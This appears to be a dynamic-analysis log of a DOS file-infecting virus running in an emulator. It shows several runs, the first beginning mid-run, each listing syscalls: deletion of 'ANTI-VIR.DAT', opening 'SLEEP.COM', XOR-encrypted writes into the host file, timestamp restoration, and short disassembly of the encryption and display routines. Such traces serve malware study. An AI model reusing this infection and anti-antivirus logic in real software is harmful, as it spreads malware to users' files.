2018-12-25T12:31:24.170626292Z 63 PC: 152c7 | Read file or device (Read 5 bytes on handle 5)
2018-12-25T12:31:24.179612486Z 66 PC: 152ff | Move file pointer
2018-12-25T12:31:24.181668617Z 63 PC: 15316 | Read file or device (Read 7 bytes on handle 5)
2018-12-25T12:31:24.184724254Z 44 PC: 1532a | Get time 0x1532a: mov word ptr [bp + 0x40a], dx
0x1532e: mov cx, 0x15
0x15331: lea dx, word ptr [bp + 0x105]
0x15335: pop ax
0x15336: int 0x21
0x15338: push ax
0x15339: push bp
0x1533a: mov bp, sp
0x1533c: mov word ptr [bp + 2], 0x4001
0x15341: pop bp
0x15342: mov cx, 0x178
0x15345: mov dx, word ptr [bp + 0x40a]
0x15349: lea si, word ptr [bp + 0x11a]
0x1534d: lea di, word ptr [bp + 0x4e2]
0x15351: lodsw ax, word ptr [si]
0x15352: xor ax, dx
0x15354: stosw word ptr es:[di], ax
0x15355: loop 0x15351
0x15357: mov cx, 0x2f0
0x1535a: lea dx, word ptr [bp + 0x4e2]
2018-12-25T12:31:24.188262379Z 64 PC: 15338 | Write file or device (Write 21 bytes on handle 5)
2018-12-25T12:31:24.191669162Z 64 PC: 1536c | Write file or device (Write 752 bytes on handle 5)
2018-12-25T12:31:24.346365049Z 64 PC: 15376 | Write file or device (Write 35 bytes on handle 5)
2018-12-25T12:31:24.355294649Z 66 PC: 15388 | Move file pointer
2018-12-25T12:31:24.356840224Z 64 PC: 15392 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:31:24.364083088Z 87 PC: 153a7 | Get or set file date and time
2018-12-25T12:31:24.366512075Z 62 PC: 153ab | Close file
2018-12-25T12:31:24.577595457Z 67 PC: 153ba | Get or set file attributes
2018-12-25T12:31:24.582853151Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:24.587112616Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:24.590310679Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:24.601556856Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:24.608961466Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:24.617091114Z 66 PC: 152ff | Move file pointer (See above)
2018-12-25T12:31:24.618658899Z 63 PC: 15316 | Read file or device (See above)
2018-12-25T12:31:24.62134879Z 44 PC: 1532a | Get time (See above)
2018-12-25T12:31:24.629342213Z 64 PC: 15338 | Write file or device (See above)
2018-12-25T12:31:24.632921085Z 64 PC: 1536c | Write file or device (See above)
2018-12-25T12:31:24.655490895Z 64 PC: 15376 | Write file or device (See above)
2018-12-25T12:31:24.659470853Z 66 PC: 15388 | Move file pointer (See above)
2018-12-25T12:31:24.661564111Z 64 PC: 15392 | Write file or device (See above)
2018-12-25T12:31:24.669440982Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:24.671717738Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:24.680926592Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:24.686505592Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:24.690042436Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:24.700958478Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:24.708694351Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:24.716603576Z 66 PC: 152ff | Move file pointer (See above)
2018-12-25T12:31:24.718209591Z 63 PC: 15316 | Read file or device (See above)
2018-12-25T12:31:24.721000804Z 44 PC: 1532a | Get time (See above)
2018-12-25T12:31:24.723602172Z 64 PC: 15338 | Write file or device (See above)
2018-12-25T12:31:24.727907672Z 64 PC: 1536c | Write file or device (See above)
2018-12-25T12:31:24.737699034Z 64 PC: 15376 | Write file or device (See above)
2018-12-25T12:31:24.740677168Z 66 PC: 15388 | Move file pointer (See above)
2018-12-25T12:31:24.743267663Z 64 PC: 15392 | Write file or device (See above)
2018-12-25T12:31:24.750976511Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:24.752687421Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:24.76283503Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:24.76823264Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:24.771849835Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:24.78359868Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:24.791801369Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:24.799627109Z 66 PC: 152ff | Move file pointer (See above)
2018-12-25T12:31:24.80167547Z 63 PC: 15316 | Read file or device (See above)
2018-12-25T12:31:24.805661961Z 44 PC: 1532a | Get time (See above)
2018-12-25T12:31:24.80843056Z 64 PC: 15338 | Write file or device (See above)
2018-12-25T12:31:24.812673961Z 64 PC: 1536c | Write file or device (See above)
2018-12-25T12:31:24.822626447Z 64 PC: 15376 | Write file or device (See above)
2018-12-25T12:31:24.825746164Z 66 PC: 15388 | Move file pointer (See above)
2018-12-25T12:31:24.827772098Z 64 PC: 15392 | Write file or device (See above)
2018-12-25T12:31:24.836700046Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:24.838426576Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:24.848059152Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:24.855153633Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:24.858676212Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:24.870706861Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:24.87951956Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:24.887374099Z 66 PC: 152ff | Move file pointer (See above)
2018-12-25T12:31:24.889266669Z 63 PC: 15316 | Read file or device (See above)
2018-12-25T12:31:24.892406124Z 44 PC: 1532a | Get time (See above)
2018-12-25T12:31:24.895470276Z 64 PC: 15338 | Write file or device (See above)
2018-12-25T12:31:24.898997109Z 64 PC: 1536c | Write file or device (See above)
2018-12-25T12:31:24.907907745Z 64 PC: 15376 | Write file or device (See above)
2018-12-25T12:31:24.914175664Z 66 PC: 15388 | Move file pointer (See above)
2018-12-25T12:31:24.915871963Z 64 PC: 15392 | Write file or device (See above)
2018-12-25T12:31:24.923649775Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:24.926669119Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:24.935587103Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:24.941942688Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:24.945711152Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:24.956758747Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:24.964344979Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:24.971978393Z 66 PC: 152ff | Move file pointer (See above)
2018-12-25T12:31:24.974340593Z 63 PC: 15316 | Read file or device (See above)
2018-12-25T12:31:24.977523917Z 44 PC: 1532a | Get time (See above)
2018-12-25T12:31:24.980575985Z 64 PC: 15338 | Write file or device (See above)
2018-12-25T12:31:24.991027983Z 64 PC: 1536c | Write file or device (See above)
2018-12-25T12:31:25.00042409Z 64 PC: 15376 | Write file or device (See above)
2018-12-25T12:31:25.00393612Z 66 PC: 15388 | Move file pointer (See above)
2018-12-25T12:31:25.007566513Z 64 PC: 15392 | Write file or device (See above)
2018-12-25T12:31:25.015503104Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:25.017643085Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:25.028028588Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:25.033587951Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:25.036949849Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:25.048962679Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:25.056936274Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:25.064482812Z 66 PC: 152ff | Move file pointer (See above)
2018-12-25T12:31:25.066816541Z 63 PC: 15316 | Read file or device (See above)
2018-12-25T12:31:25.070101645Z 44 PC: 1532a | Get time (See above)
2018-12-25T12:31:25.073562584Z 64 PC: 15338 | Write file or device (See above)
2018-12-25T12:31:25.078137992Z 64 PC: 1536c | Write file or device (See above)
2018-12-25T12:31:25.08735577Z 64 PC: 15376 | Write file or device (See above)
2018-12-25T12:31:25.090716965Z 66 PC: 15388 | Move file pointer (See above)
2018-12-25T12:31:25.093400617Z 64 PC: 15392 | Write file or device (See above)
2018-12-25T12:31:25.101344211Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:25.103393928Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:25.112886026Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:25.119470391Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:25.122835651Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:25.133988701Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:25.143529203Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:25.151070001Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:25.153181986Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:25.162141904Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:25.168019272Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:25.171051965Z 59 PC: 151ac | Change current directory
2018-12-25T12:31:25.176749239Z 71 PC: 151c9 | Get current directory
2018-12-25T12:31:25.18062462Z 59 PC: 151f3 | Change current directory
2018-12-25T12:31:25.192372903Z 59 PC: 1520e | Change current directory
2018-12-25T12:31:25.195151858Z 44 PC: 15212 | Get time 0x15212: cmp dx, 5
0x15215: ja 0x15239
0x15217: mov ax, 0xd
0x1521a: int 0x10
0x1521c: lea si, word ptr [bp + 0x3a4]
0x15220: cld
0x15221: lodsb al, byte ptr [si]
0x15222: or al, al
0x15224: je 0x15230
0x15226: mov ah, 0xe
0x15228: xor bh, bh
0x1522a: mov bl, 5
0x1522c: int 0x10
0x1522e: jmp 0x15220
0x15230: xor ax, ax
0x15232: int 0x16
0x15234: mov ax, 3
0x15237: int 0x10
0x15239: push ax
0x1523a: push bp
2018-12-25T12:31:25.198878803Z 26 PC: 15249 | Set disk transfer address
2018-12-25T12:31:25.200544893Z 9 PC: 12a51 | Display string (String= 'This is a sample! (10.000 bytes)')
2018-12-25T12:31:25.204359526Z 76 PC: 12a56 | Terminate with return code (Return code = '0')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":11814,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:31:23.531201168Z 26 PC: 15189 | Set disk transfer address
2018-12-25T12:31:23.542398677Z 71 PC: 15193 | Get current directory
2018-12-25T12:31:23.545742788Z 67 PC: 153df | Get or set file attributes
2018-12-25T12:31:23.552332819Z 65 PC: 153e3 | Delete file (Filename = 'ANTI-VIR.DAT')
2018-12-25T12:31:23.55954016Z 67 PC: 153df | Get or set file attributes (See above)
2018-12-25T12:31:23.572668483Z 65 PC: 153e3 | Delete file (See above)
2018-12-25T12:31:23.583728534Z 67 PC: 153df | Get or set file attributes (See above)
2018-12-25T12:31:23.590123039Z 65 PC: 153e3 | Delete file (See above)
2018-12-25T12:31:23.597034507Z 67 PC: 153df | Get or set file attributes (See above)
2018-12-25T12:31:23.603685375Z 65 PC: 153e3 | Delete file (See above)
2018-12-25T12:31:23.610437329Z 78 PC: 1519b | Find first file
2018-12-25T12:31:23.621949592Z 67 PC: 1529d | Get or set file attributes
2018-12-25T12:31:24.577977894Z 61 PC: 152b2 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:31:24.586492578Z 63 PC: 152c7 | Read file or device (Read 5 bytes on handle 5)
2018-12-25T12:31:24.595419906Z 66 PC: 152ff | Move file pointer
2018-12-25T12:31:24.596957879Z 63 PC: 15316 | Read file or device (Read 7 bytes on handle 5)
2018-12-25T12:31:24.599800697Z 44 PC: 1532a | Get time 0x1532a: mov word ptr [bp + 0x40a], dx
0x1532e: mov cx, 0x15
0x15331: lea dx, word ptr [bp + 0x105]
0x15335: pop ax
0x15336: int 0x21
0x15338: push ax
0x15339: push bp
0x1533a: mov bp, sp
0x1533c: mov word ptr [bp + 2], 0x4001
0x15341: pop bp
0x15342: mov cx, 0x178
0x15345: mov dx, word ptr [bp + 0x40a]
0x15349: lea si, word ptr [bp + 0x11a]
0x1534d: lea di, word ptr [bp + 0x4e2]
0x15351: lodsw ax, word ptr [si]
0x15352: xor ax, dx
0x15354: stosw word ptr es:[di], ax
0x15355: loop 0x15351
0x15357: mov cx, 0x2f0
0x1535a: lea dx, word ptr [bp + 0x4e2]
2018-12-25T12:31:24.6033656Z 64 PC: 15338 | Write file or device (Write 21 bytes on handle 5)
2018-12-25T12:31:24.608059999Z 64 PC: 1536c | Write file or device (Write 752 bytes on handle 5)
2018-12-25T12:31:24.61736133Z 64 PC: 15376 | Write file or device (Write 35 bytes on handle 5)
2018-12-25T12:31:24.621103515Z 66 PC: 15388 | Move file pointer
2018-12-25T12:31:24.622469366Z 64 PC: 15392 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:31:24.629617593Z 87 PC: 153a7 | Get or set file date and time
2018-12-25T12:31:24.631623085Z 62 PC: 153ab | Close file
2018-12-25T12:31:24.640042529Z 67 PC: 153ba | Get or set file attributes
2018-12-25T12:31:24.64528795Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:24.648339541Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:24.652489519Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:24.663452649Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:24.671051974Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:24.678556295Z 66 PC: 152ff | Move file pointer (See above)
2018-12-25T12:31:24.680021356Z 63 PC: 15316 | Read file or device (See above)
2018-12-25T12:31:24.682743287Z 44 PC: 1532a | Get time (See above)
2018-12-25T12:31:24.693600638Z 64 PC: 15338 | Write file or device (See above)
2018-12-25T12:31:24.697120896Z 64 PC: 1536c | Write file or device (See above)
2018-12-25T12:31:24.706294891Z 64 PC: 15376 | Write file or device (See above)
2018-12-25T12:31:24.709802067Z 66 PC: 15388 | Move file pointer (See above)
2018-12-25T12:31:24.711234696Z 64 PC: 15392 | Write file or device (See above)
2018-12-25T12:31:24.718378255Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:24.720499915Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:24.729900408Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:24.735513811Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:24.7398799Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:24.751590042Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:24.759582756Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:24.767760233Z 66 PC: 152ff | Move file pointer (See above)
2018-12-25T12:31:24.769732792Z 63 PC: 15316 | Read file or device (See above)
2018-12-25T12:31:24.772879333Z 44 PC: 1532a | Get time (See above)
2018-12-25T12:31:24.77559613Z 64 PC: 15338 | Write file or device (See above)
2018-12-25T12:31:24.778982115Z 64 PC: 1536c | Write file or device (See above)
2018-12-25T12:31:24.788085443Z 64 PC: 15376 | Write file or device (See above)
2018-12-25T12:31:24.790883767Z 66 PC: 15388 | Move file pointer (See above)
2018-12-25T12:31:24.792742197Z 64 PC: 15392 | Write file or device (See above)
2018-12-25T12:31:24.799871109Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:24.801297666Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:24.80980885Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:24.815059345Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:24.818446307Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:24.830674299Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:24.838555315Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:24.84614558Z 66 PC: 152ff | Move file pointer (See above)
2018-12-25T12:31:24.848758418Z 63 PC: 15316 | Read file or device (See above)
2018-12-25T12:31:24.852822832Z 44 PC: 1532a | Get time (See above)
2018-12-25T12:31:24.855648716Z 64 PC: 15338 | Write file or device (See above)
2018-12-25T12:31:24.860115726Z 64 PC: 1536c | Write file or device (See above)
2018-12-25T12:31:24.86933845Z 64 PC: 15376 | Write file or device (See above)
2018-12-25T12:31:24.872798118Z 66 PC: 15388 | Move file pointer (See above)
2018-12-25T12:31:24.875582185Z 64 PC: 15392 | Write file or device (See above)
2018-12-25T12:31:24.883405453Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:24.885522739Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:24.894562961Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:24.901193835Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:24.90465221Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:24.915856726Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:24.925015289Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:24.932545822Z 66 PC: 152ff | Move file pointer (See above)
2018-12-25T12:31:24.934571332Z 63 PC: 15316 | Read file or device (See above)
2018-12-25T12:31:24.938598931Z 44 PC: 1532a | Get time (See above)
2018-12-25T12:31:24.9413841Z 64 PC: 15338 | Write file or device (See above)
2018-12-25T12:31:24.944767568Z 64 PC: 1536c | Write file or device (See above)
2018-12-25T12:31:24.954649149Z 64 PC: 15376 | Write file or device (See above)
2018-12-25T12:31:24.95792321Z 66 PC: 15388 | Move file pointer (See above)
2018-12-25T12:31:24.959813795Z 64 PC: 15392 | Write file or device (See above)
2018-12-25T12:31:24.967727515Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:24.970189166Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:24.979049975Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:24.984579415Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:24.989023291Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:25.00021553Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:25.008012602Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:25.016943856Z 66 PC: 152ff | Move file pointer (See above)
2018-12-25T12:31:25.018807833Z 63 PC: 15316 | Read file or device (See above)
2018-12-25T12:31:25.021882384Z 44 PC: 1532a | Get time (See above)
2018-12-25T12:31:25.025467992Z 64 PC: 15338 | Write file or device (See above)
2018-12-25T12:31:25.035111994Z 64 PC: 1536c | Write file or device (See above)
2018-12-25T12:31:25.045023475Z 64 PC: 15376 | Write file or device (See above)
2018-12-25T12:31:25.048859117Z 66 PC: 15388 | Move file pointer (See above)
2018-12-25T12:31:25.05066704Z 64 PC: 15392 | Write file or device (See above)
2018-12-25T12:31:25.059197952Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:25.061351575Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:25.070760596Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:25.077373556Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:25.080571712Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:25.091976923Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:25.101540499Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:25.108876544Z 66 PC: 152ff | Move file pointer (See above)
2018-12-25T12:31:25.111567113Z 63 PC: 15316 | Read file or device (See above)
2018-12-25T12:31:25.114959449Z 44 PC: 1532a | Get time (See above)
2018-12-25T12:31:25.118724631Z 64 PC: 15338 | Write file or device (See above)
2018-12-25T12:31:25.123183684Z 64 PC: 1536c | Write file or device (See above)
2018-12-25T12:31:25.132995239Z 64 PC: 15376 | Write file or device (See above)
2018-12-25T12:31:25.136508414Z 66 PC: 15388 | Move file pointer (See above)
2018-12-25T12:31:25.139039359Z 64 PC: 15392 | Write file or device (See above)
2018-12-25T12:31:25.146767654Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:25.14851042Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:25.157912498Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:25.163777242Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:25.167513407Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:25.179868314Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:25.18882134Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:25.192056397Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:25.194788614Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:25.203352052Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:25.209732663Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:25.212600012Z 59 PC: 151ac | Change current directory
2018-12-25T12:31:25.218526865Z 71 PC: 151c9 | Get current directory
2018-12-25T12:31:25.222636469Z 59 PC: 151f3 | Change current directory
2018-12-25T12:31:25.235234143Z 59 PC: 1520e | Change current directory
2018-12-25T12:31:25.237943518Z 44 PC: 15212 | Get time 0x15212: cmp dx, 5
0x15215: ja 0x15239
0x15217: mov ax, 0xd
0x1521a: int 0x10
0x1521c: lea si, word ptr [bp + 0x3a4]
0x15220: cld
0x15221: lodsb al, byte ptr [si]
0x15222: or al, al
0x15224: je 0x15230
0x15226: mov ah, 0xe
0x15228: xor bh, bh
0x1522a: mov bl, 5
0x1522c: int 0x10
0x1522e: jmp 0x15220
0x15230: xor ax, ax
0x15232: int 0x16
0x15234: mov ax, 3
0x15237: int 0x10
0x15239: push ax
0x1523a: push bp
2018-12-25T12:31:25.240620702Z 26 PC: 15249 | Set disk transfer address
2018-12-25T12:31:25.242903566Z 9 PC: 12a51 | Display string (String= 'This is a sample! (10.000 bytes)')
2018-12-25T12:31:25.246179912Z 76 PC: 12a56 | Terminate with return code (Return code = '0')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":11814,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:31:23.821827146Z 26 PC: 15189 | Set disk transfer address
2018-12-25T12:31:23.82426837Z 71 PC: 15193 | Get current directory
2018-12-25T12:31:23.827526295Z 67 PC: 153df | Get or set file attributes
2018-12-25T12:31:23.833452915Z 65 PC: 153e3 | Delete file (Filename = 'ANTI-VIR.DAT')
2018-12-25T12:31:23.841916038Z 67 PC: 153df | Get or set file attributes (See above)
2018-12-25T12:31:23.848322202Z 65 PC: 153e3 | Delete file (See above)
2018-12-25T12:31:23.858787402Z 67 PC: 153df | Get or set file attributes (See above)
2018-12-25T12:31:23.869872231Z 65 PC: 153e3 | Delete file (See above)
2018-12-25T12:31:23.877243569Z 67 PC: 153df | Get or set file attributes (See above)
2018-12-25T12:31:23.882676016Z 65 PC: 153e3 | Delete file (See above)
2018-12-25T12:31:23.888791294Z 78 PC: 1519b | Find first file
2018-12-25T12:31:23.901064113Z 67 PC: 1529d | Get or set file attributes
2018-12-25T12:31:23.921830706Z 61 PC: 152b2 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:31:23.934021933Z 63 PC: 152c7 | Read file or device (Read 5 bytes on handle 5)
2018-12-25T12:31:23.941932578Z 66 PC: 152ff | Move file pointer
2018-12-25T12:31:23.943736527Z 63 PC: 15316 | Read file or device (Read 7 bytes on handle 5)
2018-12-25T12:31:23.946224362Z 44 PC: 1532a | Get time 0x1532a: mov word ptr [bp + 0x40a], dx
0x1532e: mov cx, 0x15
0x15331: lea dx, word ptr [bp + 0x105]
0x15335: pop ax
0x15336: int 0x21
0x15338: push ax
0x15339: push bp
0x1533a: mov bp, sp
0x1533c: mov word ptr [bp + 2], 0x4001
0x15341: pop bp
0x15342: mov cx, 0x178
0x15345: mov dx, word ptr [bp + 0x40a]
0x15349: lea si, word ptr [bp + 0x11a]
0x1534d: lea di, word ptr [bp + 0x4e2]
0x15351: lodsw ax, word ptr [si]
0x15352: xor ax, dx
0x15354: stosw word ptr es:[di], ax
0x15355: loop 0x15351
0x15357: mov cx, 0x2f0
0x1535a: lea dx, word ptr [bp + 0x4e2]
2018-12-25T12:31:23.95005392Z 64 PC: 15338 | Write file or device (Write 21 bytes on handle 5)
2018-12-25T12:31:23.952074582Z 64 PC: 1536c | Write file or device (Write 752 bytes on handle 5)
2018-12-25T12:31:23.958109335Z 64 PC: 15376 | Write file or device (Write 35 bytes on handle 5)
2018-12-25T12:31:23.960166474Z 66 PC: 15388 | Move file pointer
2018-12-25T12:31:23.964255861Z 64 PC: 15392 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:31:23.970917984Z 87 PC: 153a7 | Get or set file date and time
2018-12-25T12:31:23.972439419Z 62 PC: 153ab | Close file
2018-12-25T12:31:23.980342772Z 67 PC: 153ba | Get or set file attributes
2018-12-25T12:31:23.985310514Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:23.988589996Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:23.992546044Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:24.002637794Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:24.010187981Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:24.017858552Z 66 PC: 152ff | Move file pointer (See above)
2018-12-25T12:31:24.019264526Z 63 PC: 15316 | Read file or device (See above)
2018-12-25T12:31:24.02168292Z 44 PC: 1532a | Get time (See above)
2018-12-25T12:31:24.025074464Z 64 PC: 15338 | Write file or device (See above)
2018-12-25T12:31:24.027994115Z 64 PC: 1536c | Write file or device (See above)
2018-12-25T12:31:24.033492063Z 64 PC: 15376 | Write file or device (See above)
2018-12-25T12:31:24.036788806Z 66 PC: 15388 | Move file pointer (See above)
2018-12-25T12:31:24.038664678Z 64 PC: 15392 | Write file or device (See above)
2018-12-25T12:31:24.04320275Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:24.045236679Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:24.050665038Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:24.053839743Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:24.056475349Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:24.062819128Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:24.07164169Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:24.080112199Z 66 PC: 152ff | Move file pointer (See above)
2018-12-25T12:31:24.081818567Z 63 PC: 15316 | Read file or device (See above)
2018-12-25T12:31:24.084506092Z 44 PC: 1532a | Get time (See above)
2018-12-25T12:31:24.087866147Z 64 PC: 15338 | Write file or device (See above)
2018-12-25T12:31:24.091509862Z 64 PC: 1536c | Write file or device (See above)
2018-12-25T12:31:24.099542007Z 64 PC: 15376 | Write file or device (See above)
2018-12-25T12:31:24.102931623Z 66 PC: 15388 | Move file pointer (See above)
2018-12-25T12:31:24.104348145Z 64 PC: 15392 | Write file or device (See above)
2018-12-25T12:31:24.1160056Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:24.118006022Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:24.125764624Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:24.130338442Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:24.133127861Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:24.143115032Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:24.150208842Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:24.156626154Z 66 PC: 152ff | Move file pointer (See above)
2018-12-25T12:31:24.159177967Z 63 PC: 15316 | Read file or device (See above)
2018-12-25T12:31:24.160790491Z 44 PC: 1532a | Get time (See above)
2018-12-25T12:31:24.162274733Z 64 PC: 15338 | Write file or device (See above)
2018-12-25T12:31:24.164650399Z 64 PC: 1536c | Write file or device (See above)
2018-12-25T12:31:24.169745762Z 64 PC: 15376 | Write file or device (See above)
2018-12-25T12:31:24.171549818Z 66 PC: 15388 | Move file pointer (See above)
2018-12-25T12:31:24.173602362Z 64 PC: 15392 | Write file or device (See above)
2018-12-25T12:31:24.1797685Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:24.181071634Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:24.18879381Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:24.193148551Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:24.195599573Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:24.2053162Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:24.212259443Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:24.218164133Z 66 PC: 152ff | Move file pointer (See above)
2018-12-25T12:31:24.219748729Z 63 PC: 15316 | Read file or device (See above)
2018-12-25T12:31:24.222355067Z 44 PC: 1532a | Get time (See above)
2018-12-25T12:31:24.224370201Z 64 PC: 15338 | Write file or device (See above)
